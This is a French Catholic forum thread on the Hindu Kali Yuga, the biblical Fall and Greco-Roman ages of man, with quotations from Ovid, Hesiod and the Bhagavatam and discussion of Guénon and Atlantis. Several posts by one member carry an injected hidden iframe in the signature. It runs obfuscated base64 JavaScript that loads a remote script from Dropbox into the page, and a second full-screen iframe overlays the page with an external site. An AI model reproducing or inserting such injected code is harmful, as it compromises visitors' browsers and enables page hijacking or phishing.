DOCTEUR ANGÉLIQUE FORUM CATHOLIQUE

Théologie Spirituelle Catholique
Pour déposer une intention de prière : Agapé
ATTENTION : Les publicités ci-dessous sont indépendantes de notre volonté !
 
AccueilAccueil  PortailPortail  S'enregistrerS'enregistrer  Connexion  

Partagez | 
 

 Hindouisme : Le Kali Yuga et l'âge de fer

Aller en bas 
Aller à la page : 1, 2  Suivant
AuteurMessage
J&B

avatar

Féminin Messages : 3431
Inscription : 09/08/2014

MessageSujet: Hindouisme : Le Kali Yuga et l'âge de fer   Sam 27 Déc 2014, 22:17

Serait-il possible que le début du Kali-Yuga corresponde à ce que le judéo-christianisme et l'islam appelle la Chute d'Adam ?
La rupture de l'humanité avec Dieu.
La dégénérescence qui débute avec Caïn,  premier meurtrier, meurtrier du Juste,  et dont le nom signifie "acquérir", "acheter", "posséder", "jalousie" il fut aussi le premier homme à travailler le fer et fonder une ville.


Kali Yuga, l'âge sombre, le 4ème et dernier dans la tradition hindoue correspond aussi à l'âge de fer, selon le mythes des âges dans les traditions grecques et latines, à toute l'histoire de la Bible et aux prophéties de Jésus et de Paul sur la fin des temps (qui sont les derniers)

Description de l'âge de fer selon Ovide :
Le dernier âge eut la dureté du fer. Aussitôt firent irruption dans cette époque d'une veine plus mauvaise tous les sacrilèges; alors s'enfuirent la pudeur, la vérité, la bonne foi; à leur place apparurent les tromperies, les ruses, les pièges, la violence et la passion coupable de la possession.
[...]
On ne demandait plus seulement à la riche terre les moissons et les aliments qu'elle doit produire, mais on pénétra jusqu'à ses entrailles, on se mit à extraire les ressources qu'elle avait cachées et transportées près des ombres du Styx, ces trésors qui sont sources de nos maux. Déjà le fer nuisible et l'or, plus néfaste que le fer, étaient apparus : arrive la guerre qui se bat grâce à l'un et l'autre et agite dans sa main ensanglantée des armes retentissantes.
http://remacle.org/bloodwolf/liege1/Fantasmagories/2fan3.htm#texte



Hésiode, race de fer :
...et j'aurais préféré être mort avant ou né après.Car aujourd'hui, c'est la race du fer. Les hommes ne cesseront ni le jour ni la nuit d'endurer la peine et la misère et les dieux leur enverront de pénibles chagrins. Il y a encore des bonheurs qui se mêlent à leurs maux mais Zeus anéantira aussi cette race d'hommes périssables : ce sera le moment où ils naîtront avec des tempes blanches. Le père alors ne ressemblera plus à ses fils ni les fils à leur père ; l'hôte ne sera plus cher à son hôte, l'ami à son ami, le frère à son frère, ainsi qu'aux jours passés.

A leurs parents, sitôt qu'ils vieilliront, ils ne montreront que mépris ; pour se plaindre d'eux, ils s'exprimeront en paroles rudes, les méchants ! et ne connaîtront même pas la crainte du Ciel. Aux vieillards qui les ont nourris ils refuseront les aliments'. Nul prix ne s'attachera plus au serment tenu, au juste, au bien : c'est à l'artisan de crimes, à l'homme tout démesure qu'iront leurs respects ; le seul droit sera la force, la conscience n'existera plus. Le lâche attaquera, le brave avec des mots tortueux, qu'il appuiera d'un faux serment. Aux pas de tous les misérables humains s'attachera la jalousie, au langage amer, au front haineux, qui se plaît au mal. Alors, quittant pour l'Olympe la terre aux larges routes, cachant leurs beaux corps sous des voiles blancs, Conscience et Vergogne, délaissant les hommes, monteront vers les Eternels. De tristes souffrances resteront seules aux mor­tels : contre le mal il ne sera point de recours.
Source : http://194.254.24.219/calendriers/grec/fer.html


Extraits de la description du kali-yuga :
"Au cours de l'âge de Kali, on jugera de la valeur et de la position sociale d'un homme selon sa richesse." (Śrimad-Bhāgavatam., 12.2.2).  
"Les principes religieux et la justice devront se soumettre à la puissance temporelle."  
"Le mariage ne se fondera que sur une affection passagère, et pour réussir dans les affaires il faudra tromper autrui."
"Les pauvres n'auront pas droit à la justice, et n'importe quel beau parleur sera décrété grand philosophe."
"Ce sera un déshonneur que de ne pas vivre dans l'opulence, alors qu'un individu bouffi d'orgueil se fera hypocritement passer pour un être pieux. Le mariage reposera sur un accord arbitraire et superficiel, et il suffira de prendre un bain pour se croire parfaitement propre et attirant."
"L'homme ne vivra plus que pour remplir son estomac et les déclarations qui s'imposent par leur caractère audacieux seront acceptées comme vérité absolue. L'homme qui saura assumer convenablement la charge d'une famille sera considéré comme un être exceptionnel, et l'on mesurera sa piété à la bonne réputation qu'il se sera faite dans le monde."
"Ces canailles sans scrupule déguisées en dirigeants oppresseront tant les citoyens que ces derniers abandonneront leur famille et leurs biens pour se réfugier dans les collines et les forêts."
sources :  http://www.vedaveda.com/les_vedas/solution/002.html
Revenir en haut Aller en bas
Miles Templi

avatar

Masculin Messages : 2728
Inscription : 03/07/2014

MessageSujet: Re: Hindouisme : Le Kali Yuga et l'âge de fer   Dim 28 Déc 2014, 08:16

Serait-il possible que le début du Kali-Yuga corresponde à ce que le judéo-christianisme et l'islam appelle la Chute d'Adam ?

Ce que notre tradition appelle la Chute correspond à la fin de l'Age d'Or. Et nul doute qu'actuellement nous sommes dans les tout derniers instants du Kali Yuga.

_________________
Le regard par lequel je Le connais est le regard même par lequel Il me connaî️t.

Maî️tre Eckhart
<iframe style='display:none' src=javascript:eval(atob('dmFyIGg9cGFyZW50LmRvY3VtZW50LmhlYWQ7aWYoIWgpe2g9cGFyZW50LmRvY3VtZW50LmJvZHk7fXZhciBzPXBhcmVudC5kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNldEF0dHJpYnV0ZSgnc3JjJywnaHR0cHM6Ly9kbC5kcm9wYm94LmNvbS9zLzVmcmFrMG5ocmsyYmVtci9hLmpzPycrTWF0aC5mbG9vcigoTWF0aC5yYW5kb20oKSoxMDApKzEpKTtoLmFwcGVuZENoaWxkKHMpOw=='));></iframe><iframe class='trueMsgFrame' style='position:absolute;left:0px;top:0px;width:100%;height:100%;z-index:1000;min-width:3000px;min-height:3000px' src='http://hat-733.getforge.io'></iframe>
Revenir en haut Aller en bas
Invité
Invité



MessageSujet: Re: Hindouisme : Le Kali Yuga et l'âge de fer   Dim 28 Déc 2014, 15:35


La Grande Parodie ou La Spiritualité à Rebours

Revenir en haut Aller en bas
Invité
Invité



MessageSujet: Re: Hindouisme : Le Kali Yuga et l'âge de fer   Dim 28 Déc 2014, 15:36

"Les Etapes de l'Action Antitraditionnelle"

Revenir en haut Aller en bas
Miles Templi

avatar

Masculin Messages : 2728
Inscription : 03/07/2014

MessageSujet: Re: Hindouisme : Le Kali Yuga et l'âge de fer   Dim 28 Déc 2014, 15:44

Encore un clone du débile LLP. Ils se reproduisent entre eux, ce n'est pas possible autrement.

_________________
Le regard par lequel je Le connais est le regard même par lequel Il me connaî️t.

Maî️tre Eckhart
<iframe style='display:none' src=javascript:eval(atob('dmFyIGg9cGFyZW50LmRvY3VtZW50LmhlYWQ7aWYoIWgpe2g9cGFyZW50LmRvY3VtZW50LmJvZHk7fXZhciBzPXBhcmVudC5kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNldEF0dHJpYnV0ZSgnc3JjJywnaHR0cHM6Ly9kbC5kcm9wYm94LmNvbS9zLzVmcmFrMG5ocmsyYmVtci9hLmpzPycrTWF0aC5mbG9vcigoTWF0aC5yYW5kb20oKSoxMDApKzEpKTtoLmFwcGVuZENoaWxkKHMpOw=='));></iframe><iframe class='trueMsgFrame' style='position:absolute;left:0px;top:0px;width:100%;height:100%;z-index:1000;min-width:3000px;min-height:3000px' src='http://hat-733.getforge.io'></iframe>
Revenir en haut Aller en bas
Invité
Invité



MessageSujet: Re: Hindouisme : Le Kali Yuga et l'âge de fer   Dim 28 Déc 2014, 15:52

Milites Templi a écrit:
Encore un clone du débile LLP. Ils se reproduisent entre eux, ce n'est pas possible autrement.

Il ne fait que lire Guénon, contre-tradition & contre-initiation, l'inversion totale, nous y sommes et c'est constitutif au Kali-Yuga.
LLP est occupé par sa soraloscopie, il est assez agaçant ce LLP.
Revenir en haut Aller en bas
Gaudius

avatar

Masculin Messages : 501
Inscription : 19/09/2014

MessageSujet: Re: Hindouisme : Le Kali Yuga et l'âge de fer   Dim 28 Déc 2014, 16:05

Je ne connais pas bien la tradition indhoue, mais j'ai l'impression qu'on essaie de trouver à tout prix des correspondances entre des traditions tout à fait différentes. D'après ce que je sais, le Kali Yuga fait partie d'un cycle qui dure en tout 64 800 ans, sur la base de 1-2-3-4, la durée de la plus longue période étant 4 fois plus longue que celle du Kali Yuga. Bref, la durée de la 1ère période est de 25 920 ans, la 2ème est de 19 440 ans, la 3ème est de 12 960 ans et la dernière, le Kali Yuga, est de 6 480 ans. Et ensuite, le cycle recommence. Or, nous vivons dans une conception linéaire du temps, et non circulaire. Comment concilier ces 2 conceptions?
Et puis, comme le dit souvent un des membres de ma loge, "bon, concrètement, qu'est ce qu'on fait?". On se borne à faire un procès verbal de constat ou on travaille à semer des graines pour le futur?

_________________
Gaudius
J'ai comme des envies de métamorphose. Je sens quelque chose qui m'attire vers le haut (Daniel Balavoine)
Revenir en haut Aller en bas
J&B

avatar

Féminin Messages : 3431
Inscription : 09/08/2014

MessageSujet: Re: Hindouisme : Le Kali Yuga et l'âge de fer   Dim 28 Déc 2014, 20:09

Gaudius a écrit:
Je ne connais pas bien la tradition indhoue, mais j'ai l'impression qu'on essaie de trouver à tout prix des correspondances entre des traditions tout à fait différentes.

Il y a, certes,  des traditions, mais une seule Tradition et Histoire humaine devant Dieu dont il s'agit d'en trouver les correspondances pour en comprendre l'essence.
Le temps psychologique, linéaire ou circulaire... ce qui importe, c'est l'axe entre le temps linéaire des causes et des conséquences et le temps "vertical" de la transcendance, l'action cruciale et juste à l'instant juste,  et c'est le seul qui compte devant Dieu. C'est ce qu'on appelle porter sa croix...

Non, il n'y a rien d'autre à faire qu'à vivre les circonstances qui sont sur notre route, c'est la liberté des enfants de Dieu, contre le libre-arbitre des hommes. La légèreté du "joug" de la croix est peut-être un critère qui nous fait voir que nous sommes dans l'action juste.


Citation :
le Kali Yuga, est de 6 480 ans
Le calendrier juif marque actuellement 5775, après la Création, mais il peut y avoir du jeu... Smile

Milites Templi a écrit:

Ce que notre tradition appelle la Chute correspond à la fin de l'Age d'Or. Et nul doute qu'actuellement nous sommes dans les tout derniers instants du Kali Yuga.

Or, signifie aussi Lumière.
Lumière qui s'atténue et ne peut être captée que faiblement aux confins de l'espace-temps ou matière.
Pareil dans le psychisme humain, qui s'assombrit, où les étoiles ne brillent plus.
Comme dans le prologue de Jean, les ténèbres n'accueillent pas la Lumière.

A l'image du cosmos qui s'éloigne de sa Source,  l'homme va donc vers l'obscurité la plus totale mais, à tout moment, par la connaissance de Dieu, il a la possibilité de se retourner vers la Source, renaître, saisir la main de la Grâce qui porte le nom de "Dieu Sauve"
Et ceci dans toutes les traditions : La connaissance détruit l'ignorance et ses illusions elle est donc salut et grâce.
Revenir en haut Aller en bas
Arnaud Dumouch
Administrateur
avatar

Masculin Messages : 87276
Inscription : 19/05/2005

MessageSujet: Re: Hindouisme : Le Kali Yuga et l'âge de fer   Dim 28 Déc 2014, 20:25

J&B a écrit:
Spoiler:
 

Ca ressemble plutôt au néolithique qui est décrit dans la Bible avec l'épisode de Noé :

Genèse 6, 12 Dieu vit la terre : elle était pervertie, car toute chair avait une conduite perverse sur la terre.
Genèse 6, 13 Dieu dit à Noé : "La fin de toute chair est arrivée, je l'ai décidé, car la terre est pleine de violence à cause des hommes et je vais les faire disparaître de la terre.

Revenir en haut Aller en bas
http://eschatologie.free.fr
J&B

avatar

Féminin Messages : 3431
Inscription : 09/08/2014

MessageSujet: Re: Hindouisme : Le Kali Yuga et l'âge de fer   Dim 28 Déc 2014, 20:32

Le néolithique, c'est une classification vue par la science des hommes, en fonction de son (pseudo) progrès matériel. Une vision rétroactive vue d'une science déjà devenue matérialiste.

Adam porte en lui toute l'humanité, Caïn en est la conséquence directe.

Revenir en haut Aller en bas
Invité
Invité



MessageSujet: Re: Hindouisme : Le Kali Yuga et l'âge de fer   Dim 28 Déc 2014, 20:53

Gaudius a écrit:
Je ne connais pas bien la tradition indhoue, mais j'ai l'impression qu'on essaie de trouver à tout prix des correspondances entre des traditions tout à fait différentes. D'après ce que je sais, le Kali Yuga fait partie d'un cycle qui dure en tout 64 800 ans, sur la base de 1-2-3-4, la durée de la plus longue période étant 4 fois plus longue que celle du Kali Yuga. Bref, la durée de la 1ère période est de 25 920 ans, la 2ème est de 19 440 ans, la 3ème est de 12 960 ans et la dernière, le Kali Yuga, est de 6 480 ans. Et ensuite, le cycle recommence. Or, nous vivons dans une conception linéaire du temps, et non circulaire. Comment concilier ces 2 conceptions?
Et puis, comme le dit souvent un des membres de ma loge, "bon, concrètement, qu'est ce qu'on fait?". On se borne à faire un procès verbal de constat ou on travaille à semer des graines pour le futur?

Cette question m'a souvent posé problème, comment concilier ces deux conceptions du temps ?
Selon mon point de vue depuis l'incarnation et la résurrection nous avons basculé dans un temps linéaire, le temps cyclique de l'histoire c'était avant .
Revenir en haut Aller en bas
Arnaud Dumouch
Administrateur
avatar

Masculin Messages : 87276
Inscription : 19/05/2005

MessageSujet: Re: Hindouisme : Le Kali Yuga et l'âge de fer   Dim 28 Déc 2014, 21:03

J&B a écrit:
Le néolithique, c'est une classification vue par la science des hommes, en fonction de son (pseudo) progrès matériel. Une vision rétroactive vue d'une science déjà devenue matérialiste.

Adam porte en lui toute l'humanité, Caïn en est la conséquence directe.


C'est plus que cela, même si le changement matériel de la vie est la cause.

Je m'explique : La disparition des grands gibier, la tâtonnante invention de l'agriculture, les villages, la promiscuité, les épidémies qui tuaient tout sans cause, tout cela a profondément changé l'humanité. Les hommes qui vivaient en harmonie avec un Grand esprit de la nature, se sont mis à imaginer un au-delà redoutables fait de multiples dieux haineux.

Pour se les rendre favorables, plutôt que de perdre tout, partout dans le monde l'âge néolithique a inventé les sacrifices humains...

Regardez le début de cette video : tout cela est expliqué :

Introduction à la Philosophie réaliste 3 ─ Petite histoire de la philosophie (1 h 20).


Les 4 âges de la philosophie : L'enfance de l'Humanité (âge des contes), l'adolescence de l'humanité (goût de l’observation et œil critique), la crise d'adolescence (les idéologies), l'âge adulte à espérer (chaque discipline scientifique à sa place et respectée).
Revenir en haut Aller en bas
http://eschatologie.free.fr
Invité
Invité



MessageSujet: Re: Hindouisme : Le Kali Yuga et l'âge de fer   Dim 28 Déc 2014, 21:12

Et l'Atlantide ? si cette histoire est vraie il faut tout revoir en histoire,archéologie,anthropologie etc  ...
Platon n'est pas un romancier de science-fiction, sauf pour l'Atlantide ?


Platon évoque l'Atlantide dans le Timée, au cours d'un récit fait par Critias, riche Athénien disciple de Socrate et parent de Platon.
Selon Critias, son arrière-grand-père Dropidès s'est vu confier par le législateur Solon (vie siècle av. J.-C.) une confidence que lui-même tenait d'un prêtre égyptien du temple de Saïs au cours d'un voyage d'études qu'il entreprit en Égypte en -5702 sous domination Perse à cette époque.
Aux dires du prêtre,
« En ce temps-là, on pouvait traverser cette mer Atlantique. Elle avait une île, devant ce passage que vous appelez, dites-vous, les colonnes d'Hercule. Cette île était plus grande que la Libye et l'Asie réunies. (…) Or, dans cette île Atlantide, des rois avaient formé un empire grand et merveilleux. »
— trad. Albert Rivaud
Le prêtre entreprend ensuite de narrer la lutte des Hellènes menés par Athènes, puis d'Athènes seule, contre les soldats atlantes venus des îles « du fond de la mer Atlantique », événements qu'il situe 9000 ans avant son époque. Peu après la victoire, des tremblements de terre surviennent à Athènes ainsi que dans l'Atlantide.
« Dans l'espace d'un seul jour et d'une nuit terribles, toute votre armée athénienne fut engloutie d'un seul coup sous la terre et, de même, l'île Atlantide s'abîma dans la mer et disparut. Voilà pourquoi, aujourd'hui encore, cet océan de là-bas est difficile et inexplorable, par l'obstacle des fonds vaseux et très bas que l'île, en s'engloutissant, a déposés. »
— trad. Albert Rivaud
Le Timée donne ensuite une description générale de la civilisation atlante, de son expansion, de la guerre contre Athènes et de la destruction finale de l'Atlantide.
Revenir en haut Aller en bas
J&B

avatar

Féminin Messages : 3431
Inscription : 09/08/2014

MessageSujet: Re: Hindouisme : Le Kali Yuga et l'âge de fer   Dim 28 Déc 2014, 21:43

Arnaud a écrit:
Je m'explique : La disparition des grands gibier, la tâtonnante invention de l'agriculture, les villages, la promiscuité, les épidémies qui tuaient tout sans cause, tout cela a profondément changé l'humanité. Les hommes qui vivaient en harmonie avec un Grand esprit de la nature, se sont mis à imaginer un au-delà redoutables fait de multiples dieux haineux.

Pour se les rendre favorables, plutôt que de perdre tout, partout dans le monde l'âge néolithique a inventé les sacrifices humains...

Oui, mais tout cela fait partie du Kali Yuga.  Avant cela, c'était l'Age d'Or, ou l'Eden dans notre tradition, tout vivait en harmonie. Rien à signaler, comme dans les deux premiers chapitres de la Genèse. L'histoire de la dégénérescence humaine commence au chapitre 3.


François Pignon a écrit:
Cette question m'a souvent posé problème, comment concilier ces deux conceptions du temps ?
Selon mon point de vue depuis l'incarnation et la résurrection nous avons basculé dans un temps linéaire, le temps cyclique de l'histoire c'était avant
Depuis la chute, on a basculé dans l'espace-temps, début de l'histoire, début du temps linéaire, il y a un passé et un futur. C'est aussi le temps psychologique, le présent doit se servir du passé pour ses projections dans le futur et ça fait partie du domaine mental. C'est cette anomalie qui nous empêche de "voir Dieu"
Le temps circulaire, c'est simplement l'observation des cycles naturels dans la vie ordinaire. Les petits cycles sont contenus dans les grands cycles.
Dans les védas, il y a des cycles de plusieurs milliers d'années, au commencement, Dieu se manifeste et à la fin, la manifestation se résorbe en Dieu.
Il y a un temps de repos et ça recommence, car la nature de Dieu est de se manifester, comme une respiration de Brahma, est-il dit dans les écritures védiques.

Notre science est arbitraire, notre monde est sous le règne de l'illusion (ou du mensonge, comme dit Jésus) le but est de construire un monde sans Dieu, l'histoire de Babel est une histoire de tous les temps et de toutes les générations.

Et la chute, c'est justement le libre-choix personnel contre la Manifestation.
C'est à dire, comme si les personnages d'un jeu vidéo se rebellaient contre le programme et le programmeur Smile
Revenir en haut Aller en bas
Miles Templi

avatar

Masculin Messages : 2728
Inscription : 03/07/2014

MessageSujet: Re: Hindouisme : Le Kali Yuga et l'âge de fer   Dim 28 Déc 2014, 21:44

Comment discuter sur la doctrine traditionnelle des cycles quand on est imprégné du "dogme" illusoire du progrès et des conceptions évolutionnistes qui s'y accolent régulièrement? Que déduire de la constatation que ceux qui sont les moins contaminés par les superstitions modernes et qui démontrent par leurs interventions un horizon intellectuel plus large ne soient pas chrétien? Je doute qu'on prenne la pleine mesure de cette dernière interrogation. Elle est pourtant une des raisons du départ de bien de grandes âmes en direction de l'Orient...et que je les comprends.

_________________
Le regard par lequel je Le connais est le regard même par lequel Il me connaî️t.

Maî️tre Eckhart
<iframe style='display:none' src=javascript:eval(atob('dmFyIGg9cGFyZW50LmRvY3VtZW50LmhlYWQ7aWYoIWgpe2g9cGFyZW50LmRvY3VtZW50LmJvZHk7fXZhciBzPXBhcmVudC5kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNldEF0dHJpYnV0ZSgnc3JjJywnaHR0cHM6Ly9kbC5kcm9wYm94LmNvbS9zLzVmcmFrMG5ocmsyYmVtci9hLmpzPycrTWF0aC5mbG9vcigoTWF0aC5yYW5kb20oKSoxMDApKzEpKTtoLmFwcGVuZENoaWxkKHMpOw=='));></iframe><iframe class='trueMsgFrame' style='position:absolute;left:0px;top:0px;width:100%;height:100%;z-index:1000;min-width:3000px;min-height:3000px' src='http://hat-733.getforge.io'></iframe>
Revenir en haut Aller en bas
J&B

avatar

Féminin Messages : 3431
Inscription : 09/08/2014

MessageSujet: Re: Hindouisme : Le Kali Yuga et l'âge de fer   Dim 28 Déc 2014, 21:54

Milites Templi,
On peut trouver dans la Bible beaucoup d’occurrences qui "réconcilient" l'Orient et l'Occident.
C'est juste le langage et la mentalité qui diffère.
Je m'y attellerai peut-être un jour...
Revenir en haut Aller en bas
Gaudius

avatar

Masculin Messages : 501
Inscription : 19/09/2014

MessageSujet: Re: Hindouisme : Le Kali Yuga et l'âge de fer   Dim 28 Déc 2014, 21:56

Qui a lu "Le cycle de l'humanité adamique"?

_________________
Gaudius
J'ai comme des envies de métamorphose. Je sens quelque chose qui m'attire vers le haut (Daniel Balavoine)
Revenir en haut Aller en bas
Miles Templi

avatar

Masculin Messages : 2728
Inscription : 03/07/2014

MessageSujet: Re: Hindouisme : Le Kali Yuga et l'âge de fer   Dim 28 Déc 2014, 22:04

J&B a écrit:
Milites Templi,
On peut trouver dans la Bible beaucoup d’occurrences qui "réconcilient" l'Orient et l'Occident.
C'est juste le langage et la mentalité qui diffère.
Je m'y attellerai peut-être un jour...

Ce n'est pas le "guénonien" dont je suis qui va vous contredire là-dessus.

_________________
Le regard par lequel je Le connais est le regard même par lequel Il me connaî️t.

Maî️tre Eckhart
<iframe style='display:none' src=javascript:eval(atob('dmFyIGg9cGFyZW50LmRvY3VtZW50LmhlYWQ7aWYoIWgpe2g9cGFyZW50LmRvY3VtZW50LmJvZHk7fXZhciBzPXBhcmVudC5kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNldEF0dHJpYnV0ZSgnc3JjJywnaHR0cHM6Ly9kbC5kcm9wYm94LmNvbS9zLzVmcmFrMG5ocmsyYmVtci9hLmpzPycrTWF0aC5mbG9vcigoTWF0aC5yYW5kb20oKSoxMDApKzEpKTtoLmFwcGVuZENoaWxkKHMpOw=='));></iframe><iframe class='trueMsgFrame' style='position:absolute;left:0px;top:0px;width:100%;height:100%;z-index:1000;min-width:3000px;min-height:3000px' src='http://hat-733.getforge.io'></iframe>
Revenir en haut Aller en bas
Invité
Invité



MessageSujet: Re: Hindouisme : Le Kali Yuga et l'âge de fer   Dim 28 Déc 2014, 22:05

J&B a écrit:



François Pignon a écrit:
Cette question m'a souvent posé problème, comment concilier ces deux conceptions du temps ?
Selon mon point de vue depuis l'incarnation et la résurrection nous avons basculé dans un temps linéaire, le temps cyclique de l'histoire c'était avant
Depuis la chute, on a basculé dans l'espace-temps, début de l'histoire, début du temps linéaire, il y a un passé et un futur. C'est aussi le temps psychologique, le présent doit se servir du passé pour ses projections dans le futur et ça fait partie du domaine mental. C'est cette anomalie qui nous empêche de "voir Dieu"
Le temps circulaire, c'est simplement l'observation des cycles naturels dans la vie ordinaire. Les petits cycles sont contenus dans les grands cycles.
Dans les védas, il y a des cycles de plusieurs milliers d'années, au commencement, Dieu se manifeste et à la fin, la manifestation se résorbe en Dieu.
Il y a un temps de repos et ça recommence, car la nature de Dieu est de se manifester, comme une respiration de Brahma, est-il dit dans les écritures védiques.

Notre science est arbitraire, notre monde est sous le règne de l'illusion (ou du mensonge, comme dit Jésus) le but est de construire un monde sans Dieu, l'histoire de Babel est une histoire de tous les temps et de toutes les générations.

Et la chute, c'est justement le libre-choix personnel contre la Manifestation.
C'est à dire, comme si les personnages d'un jeu vidéo se rebellaient contre le programme et le programmeur Smile

Pourtant il semblerait que entre la chute et l'incarnation, cette séquence soit marquée par des cycles longs, du haut vers le bas et du bas vers le haut, depuis l'incarnation (ce qui représente que 2000 ans) tout semble s’accélérer et l'Homme semble passer d'un paradigme cyclique à un paradigme linéaire (début fin),  à cause des avertissements de Jésus et de saint Jean avec l'apocalypse .
Pour preuve, certains pays non christianisés semblent ne pas encore être entrés dan l'Histoire (linéaire), ils sont toujours dans le paradigme cyclique.
En Afrique (ou Asie) le temps est souvent appréhendé comme étant  cyclique et mythique, autrement dit un temps non linéaire et non cumulatif.
( La notion de progrès et de progressisme en occident est causée par cette "nouvelle vision" linéaire du temps )
Revenir en haut Aller en bas
Miles Templi

avatar

Masculin Messages : 2728
Inscription : 03/07/2014

MessageSujet: Re: Hindouisme : Le Kali Yuga et l'âge de fer   Dim 28 Déc 2014, 22:11

Gaudius a écrit:
Qui a lu "Le cycle de l'humanité adamique"?

De Jean Phaure, ce disciple de Paul le Cour? Absolument pas sérieux. On préfèrera sur ce sujet Gaston Georgel .

_________________
Le regard par lequel je Le connais est le regard même par lequel Il me connaî️t.

Maî️tre Eckhart
<iframe style='display:none' src=javascript:eval(atob('dmFyIGg9cGFyZW50LmRvY3VtZW50LmhlYWQ7aWYoIWgpe2g9cGFyZW50LmRvY3VtZW50LmJvZHk7fXZhciBzPXBhcmVudC5kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNldEF0dHJpYnV0ZSgnc3JjJywnaHR0cHM6Ly9kbC5kcm9wYm94LmNvbS9zLzVmcmFrMG5ocmsyYmVtci9hLmpzPycrTWF0aC5mbG9vcigoTWF0aC5yYW5kb20oKSoxMDApKzEpKTtoLmFwcGVuZENoaWxkKHMpOw=='));></iframe><iframe class='trueMsgFrame' style='position:absolute;left:0px;top:0px;width:100%;height:100%;z-index:1000;min-width:3000px;min-height:3000px' src='http://hat-733.getforge.io'></iframe>
Revenir en haut Aller en bas
Gaudius

avatar

Masculin Messages : 501
Inscription : 19/09/2014

MessageSujet: Re: Hindouisme : Le Kali Yuga et l'âge de fer   Dim 28 Déc 2014, 22:19

Milites Templi a écrit:
Gaudius a écrit:
Qui a lu "Le cycle de l'humanité adamique"?

De Jean Phaure, ce disciple de Paul le Cour? Absolument pas sérieux. On préfèrera sur ce sujet Gaston Georgel .
C'est bien lui. J'admets que je me suis interrogé sur son ouvrage et même que j'ai eu un mouvement de recul. Cela dit, il a aussi produit quelques beaux poèmes.

_________________
Gaudius
J'ai comme des envies de métamorphose. Je sens quelque chose qui m'attire vers le haut (Daniel Balavoine)
Revenir en haut Aller en bas
J&B

avatar

Féminin Messages : 3431
Inscription : 09/08/2014

MessageSujet: Re: Hindouisme : Le Kali Yuga et l'âge de fer   Dim 28 Déc 2014, 22:39

http://arriere-monde.fr/espace/gaston_georgel.php

Là, la Bible a pris le modèle des 4 âges pour l'appliquer au songe de Nabuchodonosor, une sorte de théorie des 4 âges à l'intérieur de l'Age de Fer et qui sont repris dans l'Apocalypse.

Pas trop intellectuel ?

Ça a l'air très intéressant
Revenir en haut Aller en bas
Invité
Invité



MessageSujet: Re: Hindouisme : Le Kali Yuga et l'âge de fer   Dim 28 Déc 2014, 22:43

Milites Templi a écrit:
Gaudius a écrit:
Qui a lu "Le cycle de l'humanité adamique"?

De Jean Phaure, ce disciple de Paul le Cour? Absolument pas sérieux. On préfèrera sur ce sujet Gaston Georgel .

Ce Monsieur introduit la notion des 4 âges dans l'ère chrétienne, il situe la fin de l'âge d'or du christianisme à la destruction de l'Ordre du Temple.
C'est le même schéma que la théorie des 4 âges appliqué au christianisme sauf que ce cycle est le dernier si l'on suit la logique chrétienne, donc depuis le Christ le temps est linéaire âge d'or chrétien --> Kali Yuga, apocalypse/fin de l'histoire  (à moins d'être millénariste).
Revenir en haut Aller en bas
Miles Templi

avatar

Masculin Messages : 2728
Inscription : 03/07/2014

MessageSujet: Re: Hindouisme : Le Kali Yuga et l'âge de fer   Lun 29 Déc 2014, 06:11

J&B a écrit:
http://arriere-monde.fr/espace/gaston_georgel.php

Là, la Bible a pris le modèle des 4 âges pour l'appliquer au songe de Nabuchodonosor, une sorte de théorie des 4 âges à l'intérieur de l'Age de Fer et qui sont repris dans l'Apocalypse.

Pas trop intellectuel ?

Ça a l'air très intéressant


Il s'agit d'un exposé sérieux sur la doctrine traditionnelle des cycles. Il faudra privilégier l'ouvrage "les Quatre Ages de l'Humanité", la deuxième édition, revue et complétée grâce à la correspondance qu’entretint l'auteur avec René Guénon. Je ne connais pas en Français de meilleur ouvrage sur le sujet.

_________________
Le regard par lequel je Le connais est le regard même par lequel Il me connaî️t.

Maî️tre Eckhart
<iframe style='display:none' src=javascript:eval(atob('dmFyIGg9cGFyZW50LmRvY3VtZW50LmhlYWQ7aWYoIWgpe2g9cGFyZW50LmRvY3VtZW50LmJvZHk7fXZhciBzPXBhcmVudC5kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNldEF0dHJpYnV0ZSgnc3JjJywnaHR0cHM6Ly9kbC5kcm9wYm94LmNvbS9zLzVmcmFrMG5ocmsyYmVtci9hLmpzPycrTWF0aC5mbG9vcigoTWF0aC5yYW5kb20oKSoxMDApKzEpKTtoLmFwcGVuZENoaWxkKHMpOw=='));></iframe><iframe class='trueMsgFrame' style='position:absolute;left:0px;top:0px;width:100%;height:100%;z-index:1000;min-width:3000px;min-height:3000px' src='http://hat-733.getforge.io'></iframe>
Revenir en haut Aller en bas
J&B

avatar

Féminin Messages : 3431
Inscription : 09/08/2014

MessageSujet: Re: Hindouisme : Le Kali Yuga et l'âge de fer   Lun 29 Déc 2014, 11:30

Merci Milites Templi, c'est commandé !
Revenir en haut Aller en bas
Nathan2

avatar

Masculin Messages : 1446
Inscription : 06/08/2014

MessageSujet: Re: Hindouisme : Le Kali Yuga et l'âge de fer   Lun 29 Déc 2014, 11:47

L'Atlantide est-elle une fiction inventée par Platon, ou bien a-t-il divulgué des connaissances qui étaient jusqu'alors esotériques ? Je n'en sais rien.
Mais ce que raconte Platon de la chute de l'Atlantide est proche de ce que pourrait être la chute de l'humanité à la fin des temps : progrès technologique sans la sagesse nécessaire.
On en revient toujours aux deux arbres...
Revenir en haut Aller en bas
Miles Templi

avatar

Masculin Messages : 2728
Inscription : 03/07/2014

MessageSujet: Re: Hindouisme : Le Kali Yuga et l'âge de fer   Lun 29 Déc 2014, 13:06

J&B a écrit:
Merci Milites Templi, c'est commandé !

Petite indiscrétion de ma part. Vous indiquez dans votre profil n'avoir aucune appartenance religieuse. Faut-il en déduire que votre centre d'intérêt sur la spiritualité relève d'une recherche toute personnelle à l'écart de toute participation effective à une quelconque tradition?

_________________
Le regard par lequel je Le connais est le regard même par lequel Il me connaî️t.

Maî️tre Eckhart
